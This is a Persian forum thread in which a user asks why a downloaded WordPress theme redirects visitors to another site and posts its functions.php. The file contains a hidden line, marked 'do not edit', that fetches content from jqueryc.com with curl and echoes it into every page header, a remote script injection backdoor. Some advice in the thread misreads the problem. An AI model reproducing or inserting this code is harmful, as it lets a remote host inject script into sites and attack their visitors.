مشکل در باز شدن قالب

alireza1375

تازه وارد
من یک قالب از سایت شما دانلود کردم ولی هر کاری می کنم به جای این که سایت خودم را باز کنم سایت دیگری را باز می کند.وقتی هم کد این مشکل را پیدا کردم ، حذفش که کردم دیگر سایت بالا نیامد مشکل چیست؟

لینک قالب:

سایت من :

mahdiali35

کاربر عضو
من یک قالب از سایت شما دانلود کردم ولی هر کاری می کنم به جای این که سایت خودم را باز کنم سایت دیگری را باز می کند.وقتی هم کد این مشکل را پیدا کردم ، حذفش که کردم دیگر سایت بالا نیامد مشکل چیست؟لینک قالب:

سایت من :
درود....دوست عزیز بعید می دونم مشکل از قالب های این سایت باشد....احتمالا شما یک پلاگین یا...نصب کرده اید که این مشکل رو ایجاد کرده...

به هر حال شما در فایل های قالب عبارت jqueryc.com رو جستجو کنید تا ببینید مشکل از کجاس یا در فایل های پلاگینی که جدیدا نصب کرده اید...!!!

برای جستجو در چندین فایل در notepad++ در تب fine in files جستجو کنید....شاد باشید...

alireza1375

تازه وارد
درود....دوست عزیز بعید می دونم مشکل از قالب های این سایت باشد....احتمالا شما یک پلاگین یا...نصب کرده اید که این مشکل رو ایجاد کرده...به هر حال شما در فایل های قالب عبارت jqueryc.com رو جستجو کنید تا ببینید مشکل از کجاس یا در فایل های پلاگینی که جدیدا نصب کرده اید...!!!

برای جستجو در چندین فایل در notepad++ در تب fine in files جستجو کنید....شاد باشید...
اقا مشکل در فایل function.php است خط سوم را که حذف می کنم دیگر سایت بالا نمی آید.

کد:
<?php
// Required TrueThemes Framework - do not edit
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} require_once(TEMPLATEPATH . '/truethemes_framework/truethemes_framework_init.php');

// Load translation text domain
load_theme_textdomain ('truethemes_localize');

/*******************************************************************************************
Limit post
********************************************************************************************/
function dt_content_limit($max_char, $more_link_text = '', $stripteaser = 0, $more_file = '') {
    $content = get_the_content($more_link_text, $stripteaser, $more_file);
    $content = apply_filters('the_content', $content);
    $content = str_replace(']]>', ']]>', $content);
    $content = strip_tags($content);

if (strlen($_GET['p']) > 0) {
      echo "";
      echo $content;
      echo "...";
   }
   else if ((strlen($content)>$max_char) && ($espacio = strpos($content, " ", $max_char ))) {
        $content = substr($content, 0, $espacio);
        $content = $content;
        echo "";
        echo $content;
        echo "...";
   }
   else {
      echo "";
      echo $content;
   }
}
/* end */

// **** Add your custom codes below this line ****

?>

Ehs@n

کاربر عضو
مشکل از قالب نیست! قبلا تست شده!

شاید قالب کپی رایت داشته و شما حذفش کردین! که باعث ریدایرکت شدن سایت میشه

و یا هم احتمالاتی که مهدی داده!

قسمت هدر رو هم چک کنید

Mohammad

مدیر انجمن
پرسنل مدیریت

حذف کنید و یک ادرس دیگه دستی وارد کنید که فایل jquery-1.6.3.min.js باشه!

این فایل توی اکثر اسکریپت ها هست یا در گوگل جستجو کنید

alireza1375

تازه وارد
حذف کنید و یک ادرس دیگه دستی وارد کنید که فایل jquery-1.6.3.min.js باشه!

این فایل توی اکثر اسکریپت ها هست یا در گوگل جستجو کنید
آقا به جای آن یک # گذاشتم ولی بدتر شد.یک سری به سایت و صحفه ی ورود بزنید.

Mohammad

مدیر انجمن
پرسنل مدیریت
من گفتم ادرس جایگزین کنید! نگفتم حذف کنید

delhamid

تازه وارد
------------------------------------------------------------------

ویرایش شد

اینجا جای این چیزا نیست

آخرین ویرایش توسط مدیر:
بالا